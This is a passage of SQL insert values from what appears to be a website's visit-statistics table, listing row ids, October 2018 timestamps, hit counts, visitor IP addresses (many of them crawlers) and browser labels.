,0,0,'188.230.43.254','other'),(320641,1540479393,1,1,0,0,'66.249.66.57','chrome'),(320642,1540479489,1,1,0,0,'40.77.167.97','other'),(320643,1540480496,1,1,0,0,'95.163.255.95','other'),(320644,1540481306,1,1,0,0,'207.46.13.213','other'),(320645,1540481310,1,1,0,0,'188.230.43.254','other'),(320646,1540481313,1,1,0,0,'216.244.66.241','other'),(320647,1540482236,1,1,0,0,'157.55.39.153','other'),(320648,1540482373,2,2,0,0,'178.154.244.29','other'),(320649,1540482577,1,1,0,0,'66.249.66.155','chrome'),(320650,1540482582,1,1,0,0,'66.249.66.156','chrome'),(320651,1540482742,1,1,0,0,'46.211.106.73','chrome'),(320652,1540483521,1,1,0,0,'66.249.66.157','chrome'),(320653,1540483578,1,1,0,0,'95.163.255.97','other'),(320654,1540483802,1,1,0,0,'5.45.207.8','other'),(320655,1540483806,1,1,0,0,'213.180.203.17','other'),(320656,1540483854,1,1,0,0,'178.154.244.11','other'),(320657,1540483857,1,1,0,0,'5.45.207.19','other'),(320658,1540484287,1,1,0,0,'46.229.168.153','other'),(320659,1540484362,1,1,0,0,'207.46.13.213','other'),(320660,1540484379,1,1,0,0,'95.163.255.99','other'),(320661,1540484835,1,1,0,0,'40.77.167.97','other'),(320662,1540484979,1,1,0,0,'178.154.244.11','other'),(320663,1540485091,2,2,0,0,'8.29.198.26','other'),(320664,1540485294,1,1,0,0,'40.77.167.1','other'),(320665,1540485385,4,4,0,0,'178.154.244.29','other'),(320666,1540485700,1,1,0,0,'46.229.168.134','other'),(320667,1540485854,1,1,0,0,'40.77.167.97','other'),(320668,1540486722,2,2,0,0,'66.249.66.157','chrome'),(320669,1540487359,1,1,0,0,'66.249.66.156','chrome'),(320670,1540488411,3,3,0,0,'66.249.66.155','chrome'),(320671,1540488477,1,1,0,0,'8.29.198.27','other'),(320672,1540488588,1,1,0,0,'66.249.66.156','chrome'),(320673,1540488930,1,1,0,0,'37.115.92.200','chrome'),(320674,1540489061,1,1,0,0,'216.244.66.241','other'),(320675,1540489392,1,1,0,0,'64.246.165.140','firefox'),(320676,1540490490,2,2,0,0,'66.249.66.156','chrome'),(320677,1540490622,1,1,0,0,'66.249.66.155','chrome'),(320678,1540490692,2,2,0,0,'216.244.66.241','other'),(320679,1540491416,1,1,0,0,'66.249.66.157','chrome'),(320680,1540491527,1,1,0,0,'66.249.66.155','chrome'),(320681,1540491639,1,1,0,0,'216.244.66.241','other'),(320682,1540491854,1,1,0,0,'66.249.66.61','chrome'),(320683,1540491983,1,1,0,0,'130.180.208.19','other'),(320684,1540492703,1,1,0,0,'193.194.127.143','chrome'),(320685,1540493478,1,1,0,0,'40.77.167.1','other'),(320686,1540493697,1,1,0,0,'37.52.138.222','other'),(320687,1540494567,1,1,0,0,'95.163.255.99','other'),(320688,1540494909,1,1,0,0,'66.249.66.155','chrome'),(320689,1540495931,2,2,0,0,'8.29.198.27','other'),(320690,1540496718,2,2,0,0,'216.244.66.241','other'),(320691,1540497249,1,1,0,0,'47.92.243.71','other'),(320692,1540497726,1,1,0,0,'31.173.83.52','firefox'),(320693,1540497852,1,1,0,0,'46.229.168.142','other'),(320694,1540498364,1,1,0,0,'180.76.15.27','other'),(320695,1540499001,1,1,0,0,'46.229.168.154','other'),(320696,1540499315,1,1,0,0,'8.29.198.26','other'),(320697,1540499685,1,1,0,0,'216.244.66.241','other'),(320698,1540499964,2,2,0,0,'40.77.167.97','other'),(320699,1540499970,3,3,0,0,'157.55.39.153','other'),(320700,1540499974,4,4,0,0,'207.46.13.213','other'),(320701,1540500262,1,1,0,0,'91.196.178.189','chrome'),(320702,1540500558,1,1,0,0,'31.13.115.8','other'),(320703,1540500560,1,1,0,0,'31.13.127.9','other'),(320704,1540500815,1,1,0,0,'66.249.66.155','chrome'),(320705,1540500931,1,1,0,0,'66.249.66.156','chrome'),(320706,1540501078,1,1,0,0,'66.249.66.59','chrome'),(320707,1540501188,1,1,0,0,'31.13.115.3','other'),(320708,1540501547,1,1,0,0,'91.196.178.189','chrome'),(320709,1540501803,1,1,0,0,'216.244.66.241','other'),(320710,1540503535,1,1,0,0,'46.229.168.138','other'),(320711,1540504574,1,1,0,0,'46.229.168.134','other'),(320712,1540504868,2,2,0,0,'157.55.39.153','other'),(320713,1540505438,1,1,0,0,'207.46.13.213','other'),(320714,1540505807,1,1,0,0,'40.77.167.216','other'),(320715,1540505949,1,1,0,0,'40.77.167.97','other'),(320716,1540506109,1,1,0,0,'40.77.167.196','other'),(320717,1540506713,1,1,0,0,'87.250.224.47','other'),(320718,1540506767,2,2,0,0,'8.29.198.25','other'),(320719,1540508927,1,1,0,0,'66.249.66.155','chrome'),(320720,1540509417,1,1,0,0,'95.163.255.96','other'),(320721,1540509457,1,1,0,0,'193.106.30.98','firefox'),(320722,1540510151,1,1,0,0,'8.29.198.26','other'),(320723,1540510560,1,1,0,0,'66.249.66.157','chrome'),(320724,1540511399,1,1,0,0,'217.69.143.61','other'),(320725,1540512047,1,1,0,0,'207.46.13.213','other'),(320726,1540512288,1,1,0,0,'40.77.167.196','other'),(320727,1540512503,1,1,0,0,'66.249.66.156','chrome'),(320728,1540512731,1,1,0,0,'66.249.66.157','chrome'),(320729,1540514503,1,1,0,0,'66.249.66.156','chrome'),(320730,1540514903,1,1,0,0,'216.244.66.241','other'),(320731,1540514935,1,1,0,0,'66.249.66.155','chrome'),(320732,1540516410,1,1,0,0,'207.46.13.213','other'),(320733,1540517023,1,1,0,0,'66.249.66.156','chrome'),(320734,1540517302,2,2,0,0,'216.244.66.241','other'),(320735,1540517599,1,1,0,0,'46.229.168.137','other'),(320736,1540517614,1,1,0,0,'8.29.198.25','other'),(320737,1540517826,1,1,0,0,'8.29.198.27','other'),(320738,1540518385,1,1,0,0,'180.76.15.154','other'),(320739,1540518558,1,1,0,0,'46.229.168.141','other'),(320740,1540519031,1,1,0,0,'178.154.244.11','other'),(320741,1540519056,1,1,0,0,'5.45.207.79','other'),(320742,1540519388,1,1,0,0,'66.249.66.155','chrome'),(320743,1540519509,1,1,0,0,'27.115.124.3','other'),(320744,1540519896,1,1,0,0,'216.244.66.241','other'),(320745,1540520442,1,1,0,0,'80.252.153.33','firefox'),(320746,1540520984,1,1,0,0,'8.29.198.26','other'),(320747,1540521458,2,2,0,0,'66.249.66.157','chrome'),(320748,1540521978,2,2,0,0,'216.244.66.241','other'),(320749,1540522267,2,2,0,0,'66.249.66.156','chrome'),(320750,1540522271,1,1,0,0,'66.249.66.155','chrome'),(320751,1540524136,1,1,0,0,'95.163.255.94','other'),(320752,1540524180,3,3,0,0,'178.154.244.29','other'),(320753,1540524476,1,1,0,0,'54.244.107.110','chrome'),(320754,1540524598,1,1,0,0,'46.229.168.129','other'),(320755,1540524670,2,2,0,0,'66.249.66.155','chrome'),(320756,1540525743,1,1,0,0,'46.229.168.143','other'),(320757,1540527427,1,1,0,0,'207.46.13.213','other'),(320758,1540527668,1,1,0,0,'66.249.66.156','chrome'),(320759,1540527707,1,1,0,0,'66.249.66.59','chrome'),(320760,1540527745,1,1,0,0,'66.249.66.155','chrome'),(320761,1540527872,2,2,0,0,'66.249.66.157','chrome'),(320762,1540528464,2,2,0,0,'8.29.198.25','other'),(320763,1540529311,2,2,0,0,'66.249.66.156','chrome'),(320764,1540529953,1,1,0,0,'66.249.66.155','chrome'),(320765,1540530094,1,1,0,0,'46.229.168.150','other'),(320766,1540530269,1,1,0,0,'176.113.145.222','chrome'),(320767,1540530451,1,1,0,0,'195.208.106.133','msie'),(320768,1540530536,1,1,0,0,'46.229.168.152','other'),(320769,1540531658,1,1,0,0,'46.229.168.137','other'),(320770,1540531815,1,1,0,0,'8.29.198.25','other'),(320771,1540531981,1,1,0,0,'13.66.139.0','other'),(320772,1540532175,1,1,0,0,'46.229.168.132','other'),(320773,1540532370,2,2,0,0,'66.249.66.157','chrome'),(320774,1540532420,1,1,0,0,'66.249.66.155','chrome'),(320775,1540533116,1,1,0,0,'216.244.66.241','other'),(320776,1540533299,1,1,0,0,'91.196.178.68','chrome'),(320777,1540533956,1,1,0,0,'91.196.177.46','chrome'),(320778,1540534631,1,1,0,0,'46.229.168.150','other'),(320779,1540535667,2,2,0,0,'46.229.168.134','other'),(320780,1540536377,1,1,0,0,'91.196.178.97','chrome'),(320781,1540536387,1,1,0,0,'95.163.255.95','other'),(320782,1540537529,1,1,0,0,'66.249.66.157','chrome'),(320783,1540537975,1,1,0,0,'95.163.255.98','other'),(320784,1540538133,1,1,0,0,'66.249.66.156','chrome'),(320785,1540538382,2,2,0,0,'66.249.66.61','chrome'),(320786,1540538952,2,2,0,0,'46.211.67.137','chrome'),(320787,1540539303,2,2,0,0,'8.29.198.26','other'),(320788,1540539327,1,1,0,0,'66.249.66.156','chrome'),(320789,1540539719,1,1,0,0,'66.249.66.155','chrome'),(320790,1540540408,1,1,0,0,'82.145.209.77','other'),(320791,1540540528,1,1,0,0,'31.148.135.139','chrome'),(320792,1540541380,1,1,0,0,'82.145.208.121','other'),(320793,1540541675,1,1,0,0,'37.53.91.228','chrome'),(320794,1540541927,1,1,0,0,'82.145.208.240','other'),(320795,1540542126,2,2,0,0,'66.249.83.218','chrome'),(320796,1540542127,1,1,0,0,'66.249.83.221','chrome'),(320798,1540542642,1,1,0,0,'8.29.198.25','other'),(320799,1540543171,1,1,0,0,'46.229.168.139','other'),(320800,1540543427,1,1,0,0,'78.46.208.244','chrome'),(320801,1540543781,1,1,0,0,'82.145.209.207','other'),(320802,1540544260,1,1,0,0,'66.249.66.155','chrome'),(320803,1540544275,1,1,0,0,'91.196.178.89','chrome'),(320804,1540544353,1,1,0,0,'180.76.15.27','other'),(320805,1540544535,1,1,0,0,'95.163.255.98','other'),(320806,1540544585,1,1,0,0,'178.154.244.11','other'),(320807,1540544589,2,2,0,0,'5.45.207.79','other'),(320808,1540545112,1,1,0,0,'66.249.66.156','chrome'),(320809,1540545755,1,1,0,0,'91.196.178.89','chrome'),(320810,1540545795,1,1,0,0,'130.180.219.63','chrome'),(320811,1540545967,1,1,0,0,'46.229.168.153','other'),(320812,1540546012,1,1,0,0,'89.105.239.66','firefox'),(320813,1540546121,1,1,0,0,'37.54.18.169','chrome'),(320814,1540546625,1,1,0,0,'66.249.66.156','chrome'),(320815,1540546821,1,1,0,0,'66.249.66.157','chrome'),(320816,1540546872,2,2,0,0,'91.196.178.89','chrome'),(320817,1540547353,1,1,0,0,'37.73.29.91','other'),(320818,1540547791,1,1,0,0,'91.196.178.89','chrome'),(320819,1540548409,1,1,0,0,'130.180.219.63','chrome'),(320820,1540548577,2,2,0,0,'66.249.66.156','chrome'),(320821,1540548781,1,1,0,0,'66.249.66.155','chrome'),(320822,1540549266,1,1,0,0,'82.145.209.95','other'),(320823,1540549776,1,1,0,0,'46.229.168.136','other'),(320824,1540549909,1,1,0,0,'82.145.208.18','other'),(320825,1540549923,1,1,0,0,'46.229.168.132','other'),(320826,1540550138,1,1,0,0,'8.29.198.26','other'),(320827,1540550338,1,1,0,0,'8.29.198.25','other'),(320828,1540552031,1,1,0,0,'66.249.66.61','chrome'),(320829,1540552068,1,1,0,0,'91.196.178.132','firefox'),(320830,1540552093,1,1,0,0,'66.249.66.155','chrome'),(320831,1540552241,1,1,0,0,'40.77.167.97','other'),(320832,1540552346,2,2,0,0,'66.249.66.156','chrome'),(320833,1540553124,3,3,0,0,'31.43.31.61','chrome'),(320834,1540553473,1,1,0,0,'8.29.198.26','other'),(320835,1540554466,2,2,0,0,'66.249.66.157','chrome'),(320836,1540554625,1,1,0,0,'66.249.66.156','chrome'),(320837,1540554743,1,1,0,0,'46.211.133.137','chrome'),(320838,1540555170,1,1,0,0,'37.54.23.36','chrome'),(320839,1540555192,1,1,0,0,'157.55.39.153','other'),(320840,1540555679,1,1,0,0,'40.77.167.214','other'),(320841,1540555684,1,1,0,0,'40.77.167.196','other'),(320842,1540555685,2,2,0,0,'66.249.66.156','chrome'),(320843,1540555737,1,1,0,0,'91.196.178.69','firefox'),(320844,1540555832,1,1,0,0,'91.196.178.169','chrome'),(320845,1540555876,1,1,0,0,'66.249.66.155','chrome'),(320846,1540555981,1,1,0,0,'207.46.13.231','other'),(320847,1540556010,1,1,0,0,'46.211.133.137','chrome'),(320848,1540556129,1,1,0,0,'66.102.9.136','chrome'),(320849,1540556516,1,1,0,0,'207.46.13.213','other'),(320850,1540556581,1,1,0,0,'91.196.178.129','firefox'),(320851,1540557110,1,1,0,0,'40.77.167.97','other'),(320852,1540557178,1,1,0,0,'46.211.133.137','chrome'),(320853,1540557313,1,1,0,0,'91.196.177.46','firefox'),(320854,1540558115,1,1,0,0,'216.244.66.241','other'),(320855,1540558557,1,1,0,0,'178.154.171.24','other'),(320856,1540558794,2,2,0,0,'91.196.178.48','chrome'),(320857,1540558977,1,1,0,0,'91.196.178.97','chrome'),(320858,1540559574,1,1,0,0,'66.249.66.59','chrome'),(320859,1540559646,1,1,0,0,'66.249.66.156','chrome'),(320860,1540559753,1,1,0,0,'66.249.66.155','chrome'),(320861,1540560320,1,1,0,0,'91.196.178.97','chrome'),(320862,1540560982,2,2,0,0,'8.29.198.27','other'),(320863,1540561446,1,1,0,0,'91.196.178.161','chrome'),(320864,1540561991,2,2,0,0,'66.249.66.155','chrome'),(320865,1540562015,1,1,0,0,'91.196.178.83','firefox'),(320866,1540562184,1,1,0,0,'66.249.66.156','chrome'),(320867,1540562274,1,1,0,0,'46.229.168.139','other'),(320868,1540563291,1,1,0,0,'66.249.66.156','chrome'),(320869,1540563444,1,1,0,0,'66.249.66.157','chrome'),(320870,1540563553,1,1,0,0,'66.249.66.57','chrome'),(320871,1540564298,1,1,0,0,'8.29.198.27','other'),(320872,1540564531,1,1,0,0,'188.230.43.254','other'),(320873,1540564568,1,1,0,0,'31.184.238.34','chrome'),(320874,1540565973,1,1,0,0,'157.55.39.153','other'),(320875,1540566006,1,1,0,0,'178.154.244.29','other'),(320876,1540566415,1,1,0,0,'188.230.43.254','other'),(320877,1540566896,1,1,0,0,'66.249.66.157','chrome'),(320878,1540566942,1,1,0,0,'193.106.30.98','firefox'),(320879,1540566963,2,2,0,0,'66.249.66.155','chrome'),(320880,1540567902,1,1,0,0,'5.45.207.79','other'),(320881,1540568316,1,1,0,0,'66.249.66.157','chrome'),(320882,1540569188,2,2,0,0,'216.244.66.241','other'),(320883,1540569406,2,2,0,0,'66.249.66.156','chrome'),(320884,1540569419,1,1,0,0,'188.230.43.254','other'),(320885,1540569522,1,1,0,0,'40.77.167.1','other'),(320886,1540569684,1,1,0,0,'37.54.23.36','chrome'),(320887,1540570487,1,1,0,0,'95.163.255.92','other'),(320888,1540571184,1,1,0,0,'216.244.66.241','other'),(320889,1540571816,2,2,0,0,'8.29.198.26','other'),(320890,1540572030,1,1,0,0,'180.76.15.144','other'),(320891,1540572089,1,1,0,0,'66.249.66.157','chrome'),(320892,1540573083,3,3,0,0,'178.154.244.29','other'),(320893,1540573199,3,3,0,0,'216.244.66.241','other'),(320894,1540573283,1,1,0,0,'37.54.23.36','chrome'),(320895,1540573781,1,1,0,0,'37.9.113.148','other'),(320896,1540574292,1,1,0,0,'216.244.66.241','other'),(320897,1540574338,1,1,0,0,'95.163.255.95','other'),(320898,1540574431,4,4,0,0,'178.154.244.29','other'),(320899,1540574490,1,1,0,0,'5.45.207.19','other'),(320900,1540574710,1,1,0,0,'66.249.66.157','chrome'),(320901,1540575130,1,1,0,0,'8.29.198.27','other'),(320902,1540575211,1,1,0,0,'178.154.171.24','other'),(320903,1540575492,2,2,0,0,'178.154.244.29','other'),(320904,1540575885,1,1,0,0,'178.154.244.11','other'),(320905,1540576306,1,1,0,0,'46.229.168.129','other'),(320906,1540576516,1,1,0,0,'95.163.255.94','other'),(320907,1540576519,1,1,0,0,'95.163.255.99','other'),(320908,1540577034,1,1,0,0,'66.249.66.155','chrome'),(320909,1540577048,1,1,0,0,'66.249.66.156','chrome'),(320910,1540577346,1,1,0,0,'178.154.244.11','other'),(320911,1540577347,1,1,0,0,'37.9.113.103','other'),(320912,1540577348,1,1,0,0,'95.108.181.54','other'),(320913,1540577524,2,2,0,0,'178.154.244.29','other'),(320914,1540578191,1,1,0,0,'66.249.66.156','chrome'),(320915,1540578365,1,1,0,0,'157.55.39.153','other'),(320916,1540578558,3,3,0,0,'178.154.244.11','other'),(320917,1540578758,1,1,0,0,'62.122.88.14','chrome'),(320918,1540579093,1,1,0,0,'216.244.66.241','other'),(320919,1540579182,1,1,0,0,'66.249.66.156','chrome'),(320920,1540579225,2,2,0,0,'5.45.207.79','other'),(320921,1540579302,2,2,0,0,'66.249.66.155','chrome'),(320922,1540579542,2,2,0,0,'178.154.244.11','other'),(320923,1540579650,2,2,0,0,'178.154.244.29','other'),(320924,1540580250,1,1,0,0,'66.249.66.157','chrome'),(320925,1540580366,1,1,0,0,'5.45.207.79','other'),(320926,1540580805,1,1,0,0,'37.9.113.20','other'),(320927,1540580950,2,2,0,0,'178.154.244.29','other'),(320928,1540581521,1,1,0,0,'66.249.66.157','chrome'),(320929,1540581528,1,1,0,0,'178.154.244.11','other'),(320930,1540582172,1,1,0,0,'207.46.13.213','other'),(320931,1540582272,1,1,0,0,'95.163.255.92','other'),(320932,1540582285,2,2,0,0,'178.154.244.29','other'),(320933,1540582578,1,1,0,0,'46.229.168.139','other'),(320934,1540582634,1,1,0,0,'46.229.168.148','other'),(320935,1540582660,2,2,0,0,'8.29.198.26','other'),(320936,1540583243,1,1,0,0,'5.45.207.79','other'),(320937,1540583301,1,1,0,0,'46.229.168.146','other'),(320938,1540584405,3,3,0,0,'178.154.244.29','other'),(320939,1540584518,3,3,0,0,'178.154.244.11','other'),(320940,1540585244,1,1,0,0,'46.229.168.149','other'),(320941,1540585262,1,1,0,0,'5.45.207.79','other'),(320942,1540585438,2,2,0,0,'178.154.244.29','other'),(320943,1540585537,1,1,0,0,'157.55.39.176','other'),(320944,1540585860,1,1,0,0,'178.154.244.11','other'),(320945,1540585956,1,1,0,0,'8.29.198.27','other'),(320946,1540586209,2,2,0,0,'66.249.66.156','chrome'),(320947,1540586399,2,2,0,0,'66.249.66.155','chrome'),(320948,1540586724,1,1,0,0,'185.191.204.9','chrome'),(320949,1540586973,1,1,0,0,'37.53.231.53','other'),(320950,1540587125,1,1,0,0,'66.249.66.156','chrome'),(320951,1540587528,3,3,0,0,'66.249.66.157','chrome'),(320952,1540587774,3,3,0,0,'66.249.66.155','chrome'),(320953,1540587931,1,1,0,0,'207.46.13.213','other'),(320954,1540588799,1,1,0,0,'46.229.168.142','other'),(320955,1540589287,1,1,0,0,'66.249.66.156','chrome'),(320956,1540589560,1,1,0,0,'216.244.66.241','other'),(320957,1540589647,1,1,0,0,'46.229.168.137','other'),(320958,1540589667,1,1,0,0,'178.154.244.29','other'),(320959,1540590808,1,1,0,0,'66.249.66.155','chrome'),(320960,1540590849,1,1,0,0,'66.249.66.156','chrome'),(320961,1540591331,1,1,0,0,'46.229.168.129','other'),(320962,1540591568,1,1,0,0,'46.229.168.140','other'),(320963,1540591761,2,2,0,0,'178.154.244.11','other'),(320964,1540591943,1,1,0,0,'66.249.66.156','chrome'),(320965,1540592103,2,2,0,0,'216.244.66.241','other'),(320966,1540592885,2,2,0,0,'66.249.66.157','chrome'),(320967,1540593490,1,1,0,0,'8.29.198.25','other'),(320968,1540593730,1,1,0,0,'8.29.198.26','other'),(320969,1540594176,1,1,0,0,'46.229.168.144','other'),(320970,1540594941,1,1,0,0,'66.249.66.155','chrome'),(320971,1540595120,1,1,0,0,'66.249.66.157','chrome'),(320972,1540595367,1,1,0,0,'66.249.66.156','chrome'),(320973,1540596437,1,1,0,0,'66.249.66.156','chrome'),(320974,1540596779,1,1,0,0,'8.29.198.26','other'),(320975,1540597176,2,2,0,0,'216.244.66.241','other'),(320976,1540597667,1,1,0,0,'66.249.66.155','chrome'),(320977,1540597750,1,1,0,0,'46.229.168.154','other'),(320978,1540598088,2,2,0,0,'54.165.59.7','other'),(320979,1540599782,2,2,0,0,'216.244.66.241','other'),(320980,1540600101,1,1,0,0,'66.249.66.157','chrome'),(320981,1540600523,1,1,0,0,'46.211.135.74','chrome'),(320982,1540600571,1,1,0,0,'95.163.255.109','other'),(320983,1540600890,1,1,0,0,'46.229.168.143','other'),(320984,1540601727,1,1,0,0,'66.249.66.155','chrome'),(320985,1540601959,1,1,0,0,'216.244.66.241','other'),(320986,1540603370,1,1,0,0,'157.55.39.153','other'),(320987,1540603640,1,1,0,0,'95.163.255.117','other'),(320988,1540603647,2,2,0,0,'95.163.255.113','other'),(320989,1540603652,2,2,0,0,'95.163.255.104','other'),(320990,1540603659,3,3,0,0,'95.163.255.119','other'),(320991,1540603667,3,3,0,0,'95.163.255.103','other'),(320992,1540603673,1,1,0,0,'95.163.255.112','other'),(320993,1540603721,1,1,0,0,'95.163.255.106','other'),(320994,1540604276,1,1,0,0,'34.214.182.122','chrome'),(320995,1540604319,1,1,0,0,'8.29.198.27','other'),(320996,1540604576,1,1,0,0,'8.29.198.25','other'),(320997,1540604675,1,1,0,0,'157.55.39.153','other'),(320998,1540605326,1,1,0,0,'66.249.66.157','chrome'),(320999,1540606616,1,1,0,0,'180.76.15.154','other'),(321000,1540606786,1,1,0,0,'66.249.66.157','chrome'),(321001,1540607448,1,1,0,0,'66.249.66.155','chrome'),(321002,1540607611,1,1,0,0,'8.29.198.26','other'),(321003,1540608361,1,1,0,0,'178.154.244.11','other'),(321004,1540608490,1,1,0,0,'66.249.66.157','chrome'),(321005,1540608578,1,1,0,0,'216.244.66.241','other'),(321006,1540608799,1,1,0,0,'66.249.66.156','chrome'),(321007,1540608838,2,2,0,0,'66.249.66.155','chrome'),(321008,1540608894,6,6,0,0,'178.154.244.29','other'),(321009,1540609000,1,1,0,0,'5.45.207.79','other'),(321010,1540609757,2,2,0,0,'216.244.66.241','other'),(321011,1540610077,1,1,0,0,'178.154.244.29','other'),(321012,1540610133,1,1,0,0,'157.55.39.153','other'),(321013,1540610255,1,1,0,0,'66.249.66.157','chrome'),(321014,1540610727,1,1,0,0,'5.45.207.19','other'),(321015,1540611840,4,4,0,0,'144.76.119.99','other'),(321016,1540612298,1,1,0,0,'54.165.59.7','other'),(321017,1540612457,1,1,0,0,'40.77.167.1','other'),(321018,1540612990,1,1,0,0,'91.196.178.131','firefox'),(321019,1540613061,1,1,0,0,'46.229.168.132','other'),(321020,1540614665,1,1,0,0,'207.46.13.154','other'),(321021,1540615150,1,1,0,0,'8.29.198.26','other'),(321022,1540615214,1,1,0,0,'54.165.59.7','other'),(321023,1540615386,1,1,0,0,'66.249.66.157','chrome'),(321024,1540615405,1,1,0,0,'8.29.198.25','other'),(321025,1540615983,1,1,0,0,'46.229.168.152','other'),(321026,1540616165,2,2,0,0,'95.213.141.126','opera'),(321027,1540616226,1,1,0,0,'178.255.215.94','other'),(321028,1540617712,1,1,0,0,'216.244.66.241','other'),(321029,1540618455,1,1,0,0,'8.29.198.27','other'),(321030,1540618468,1,1,0,0,'54.165.59.7','other'),(321031,1540619017,1,1,0,0,'46.229.168.154','other'),(321032,1540619337,1,1,0,0,'95.163.255.116','other'),(321033,1540619560,1,1,0,0,'40.77.167.1','other'),(321034,1540619792,1,1,0,0,'54.165.59.7','other'),(321035,1540621099,1,1,0,0,'66.249.66.157','chrome'),(321036,1540621330,1,1,0,0,'46.229.168.143','other'),(321037,1540622646,1,1,0,0,'54.165.59.7','other'),(321038,1540622781,2,2,0,0,'66.249.66.155','chrome'),(321039,1540623280,2,2,0,0,'173.208.206.50','other'),(321040,1540623302,1,1,0,0,'178.154.244.11','other'),(321041,1540623367,1,1,0,0,'178.255.215.94','other'),(321042,1540624483,1,1,0,0,'178.154.244.29','other'),(321043,1540625109,2,2,0,0,'216.244.66.241','other'),(321044,1540625453,1,1,0,0,'193.106.30.98','firefox'),(321045,1540625985,2,2,0,0,'8.29.198.27','other'),(321046,1540626121,1,1,0,0,'46.229.168.136','other'),(321047,1540626276,1,1,0,0,'207.46.13.154','other'),(321048,1540626323,1,1,0,0,'37.54.23.36','chrome'),(321049,1540626783,1,1,0,0,'46.229.168.139','other'),(321050,1540628460,1,1,0,0,'91.196.178.48','chrome'),(321051,1540629286,1,1,0,0,'8.29.198.27','other'),(321052,1540629729,6,6,0,0,'208.110.93.78','other'),(321053,1540629960,1,1,0,0,'180.76.15.141','other'),(321054,1540630516,1,1,0,0,'216.244.66.241','other'),(321055,1540630554,1,1,0,0,'66.249.66.57','chrome'),(321056,1540630775,1,1,0,0,'66.249.66.155','chrome'),(321057,1540631964,1,1,0,0,'216.244.66.241','other'),(321058,1540631983,1,1,0,0,'157.55.39.153','other'),(321059,1540633172,1,1,0,0,'216.244.66.241','other'),(321060,1540633618,1,1,0,0,'46.229.168.145','other'),(321061,1540633932,1,1,0,0,'66.249.66.157','chrome'),(321062,1540634037,1,1,0,0,'66.249.66.156','chrome'),(321063,1540635087,1,1,0,0,'46.229.168.147','other'),(321064,1540635201,1,1,0,0,'52.53.201.78','chrome'),(321065,1540636815,2,2,0,0,'8.29.198.25','other'),(321066,1540637209,1,1,0,0,'157.55.39.101','other'),(321067,1540638106,1,1,0,0,'46.229.168.152','other'),(321068,1540638158,2,2,0,0,'216.244.66.241','other'),(321069,1540638918,2,2,0,0,'66.249.66.155','chrome'),(321070,1540639055,1,1,0,0,'66.249.66.57','chrome'),(321071,1540639181,1,1,0,0,'66.249.66.59','chrome'),(321072,1540640115,1,1,0,0,'46.229.168.142','other'),(321073,1540640117,1,1,0,0,'8.29.198.26','other'),(321074,1540640517,1,1,0,0,'46.211.112.125','chrome'),(321075,1540640758,1,1,0,0,'66.249.66.155','chrome'),(321076,1540640798,1,1,0,0,'128.69.219.33','chrome'),(321077,1540641481,1,1,0,0,'180.76.15.30','other'),(321078,1540642220,1,1,0,0,'46.211.112.125','chrome'),(321079,1540643036,1,1,0,0,'66.249.66.155','chrome'),(321080,1540643093,2,2,0,0,'216.244.66.241','other'),(321081,1540643522,1,1,0,0,'66.102.9.136','chrome'),(321082,1540643529,1,1,0,0,'66.102.9.134','chrome'),(321083,1540643632,1,1,0,0,'66.102.9.131','chrome'),(321084,1540643658,1,1,0,0,'46.211.112.125','chrome'),(321085,1540644654,1,1,0,0,'66.249.66.157','chrome'),(321086,1540644766,1,1,0,0,'46.211.112.125','chrome'),(321087,1540645115,2,2,0,0,'178.154.244.29','other'),(321088,1540645152,1,1,0,0,'66.249.66.155','chrome'),(321089,1540645425,2,2,0,0,'46.211.112.125','firefox'),(321090,1540645676,1,1,0,0,'46.211.112.125','chrome'),(321091,1540645893,1,1,0,0,'216.244.66.241','other'),(321092,1540646369,3,3,0,0,'46.211.112.125','firefox'),(321093,1540646479,1,1,0,0,'157.55.39.101','other'),(321094,1540646635,1,1,0,0,'46.211.112.125','chrome'),(321095,1540646998,1,1,0,0,'207.46.13.245','other'),(321096,1540647358,1,1,0,0,'207.46.13.154','other'),(321097,1540647422,1,1,0,0,'95.163.255.95','other'),(321098,1540647550,1,1,0,0,'46.211.112.125','chrome'),(321099,1540647647,1,1,0,0,'8.29.198.26','other'),(321100,1540647916,1,1,0,0,'8.29.198.27','other'),(321101,1540648019,1,1,0,0,'37.115.184.19','chrome'),(321102,1540648118,1,1,0,0,'40.77.167.1','other'),(321103,1540648434,2,2,0,0,'216.244.66.241','other'),(321104,1540648501,1,1,0,0,'46.211.112.125','chrome'),(321105,1540648509,10,10,0,0,'69.30.226.234','other'),(321106,1540648681,1,1,0,0,'46.211.112.125','firefox'),(321107,1540649220,2,2,0,0,'46.211.104.138','chrome'),(321108,1540649408,4,4,0,0,'46.211.104.138','firefox'),(321109,1540649613,1,1,0,0,'46.229.168.130','other'),(321110,1540650121,1,1,0,0,'46.211.104.138','chrome'),(321111,1540650137,1,1,0,0,'66.249.64.199','chrome'),(321112,1540650197,2,2,0,0,'178.154.244.11','other'),(321113,1540650201,2,2,0,0,'5.45.207.79','other'),(321114,1540650420,3,3,0,0,'178.154.244.29','other'),(321115,1540650952,1,1,0,0,'8.29.198.25','other'),(321116,1540651204,1,1,0,0,'46.211.104.138','chrome'),(321117,1540651586,1,1,0,0,'178.154.244.11','other'),(321118,1540651797,1,1,0,0,'220.243.136.31','chrome'),(321119,1540651799,1,1,0,0,'220.243.136.66','chrome'),(321121,1540651847,1,1,0,0,'69.4.87.74','firefox'),(321122,1540651848,1,1,0,0,'69.4.87.74','other'),(321123,1540652014,1,1,0,0,'93.119.227.91','firefox'),(321124,1540652015,1,1,0,0,'93.119.227.91','other'),(321125,1540652115,1,1,0,0,'216.244.66.241','other'),(321126,1540653338,1,1,0,0,'178.154.244.11','other'),(321127,1540653674,1,1,0,0,'40.77.167.1','other'),(321128,1540654640,1,1,0,0,'87.126.68.178','other'),(321129,1540654733,1,1,0,0,'188.230.43.254','other'),(321130,1540655065,1,1,0,0,'46.211.71.133','other'),(321131,1540655698,1,1,0,0,'207.46.13.154','other'),(321132,1540655925,1,1,0,0,'157.55.39.101','other'),(321133,1540656661,1,1,0,0,'23.27.154.51','chrome'),(321134,1540657089,1,1,0,0,'46.229.168.138','other'),(321135,1540657130,1,1,0,0,'188.230.43.254','other'),(321136,1540657378,1,1,0,0,'46.211.68.22','chrome'),(321137,1540657610,1,1,0,0,'95.163.255.92','other'),(321138,1540658399,1,1,0,0,'46.211.68.22','chrome'),(321139,1540658479,1,1,0,0,'8.29.198.26','other'),(321140,1540658757,1,1,0,0,'8.29.198.25','other'),(321141,1540658944,1,1,0,0,'216.244.66.241','other'),(321142,1540659526,1,1,0,0,'46.211.68.22','chrome'),(321143,1540660033,1,1,0,0,'66.249.64.195','chrome'),(321144,1540660262,1,1,0,0,'95.163.255.96','other'),(321145,1540660707,1,1,0,0,'46.21